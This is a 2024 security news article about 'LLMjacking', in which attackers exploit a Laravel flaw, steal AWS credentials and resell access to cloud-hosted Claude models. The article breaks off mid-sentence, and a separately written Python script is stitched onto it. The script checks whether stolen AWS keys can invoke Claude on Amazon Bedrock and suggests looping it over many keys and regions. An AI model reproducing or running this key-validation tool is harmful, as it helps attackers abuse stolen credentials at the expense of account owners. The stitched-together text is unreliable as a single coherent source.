Researchers Uncover 'LLMjacking' Scheme Targeting Cloud-Hosted AI Models
May 10, 2024
Vulnerability / Cloud Security
Cybersecurity researchers have discovered a novel attack that employs stolen cloud credentials to target cloud-hosted large language model (LLM) services with the goal of selling access to other threat actors. The attack technique has been codenamed LLMjacking by the Sysdig Threat Research Team.

"Once initial access was obtained, they exfiltrated cloud credentials and gained access to the cloud environment, where they attempted to access local LLM models hosted by cloud providers," security researcher Alessandro Brucato said. "In this instance, a local Claude (v2/v3) LLM model from Anthropic was targeted."

The intrusion pathway used to pull off the scheme entails breaching a system running a vulnerable version of the Laravel Framework (e.g., CVE-2021-3129), followed by getting hold of Amazon Web Services (AWS) credentials to access the LLM services.

Among the tools used is an open-source Python script that checks and validates keys f...
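The core of such a key checker can be approximated in a few lines of boto3. The sketch below is hypothetical and is not the attackers' actual tool: it assumes the Amazon Bedrock "bedrock-runtime" client, the "anthropic.claude-v2" model ID, and a made-up helper name can_invoke_claude, and simply tests whether a candidate AWS key pair is allowed to call InvokeModel against a Bedrock-hosted Claude model.

# Hypothetical sketch (not the attackers' tool): test whether a stolen AWS
# key pair is permitted to invoke a Bedrock-hosted Anthropic Claude model.
import json

import boto3
from botocore.exceptions import ClientError


def can_invoke_claude(access_key, secret_key, region="us-east-1"):
    """Return True if the credentials appear to allow bedrock:InvokeModel."""
    runtime = boto3.client(
        "bedrock-runtime",
        aws_access_key_id=access_key,
        aws_secret_access_key=secret_key,
        region_name=region,
    )
    # Minimal Claude v2 request body; kept to a single token to stay cheap.
    body = json.dumps({
        "prompt": "\n\nHuman: ping\n\nAssistant:",
        "max_tokens_to_sample": 1,
    })
    try:
        runtime.invoke_model(modelId="anthropic.claude-v2", body=body)
        return True
    except ClientError as err:
        # An access-denied or bad-signature error means the key cannot use
        # Bedrock here; most other service-side errors imply the request
        # was at least authorized.
        code = err.response["Error"]["Code"]
        return code not in ("AccessDeniedException", "UnrecognizedClientException")

A real-world checker would iterate over many key pairs, regions, and model IDs; the single call above is only meant to illustrate the access test at the heart of the scheme.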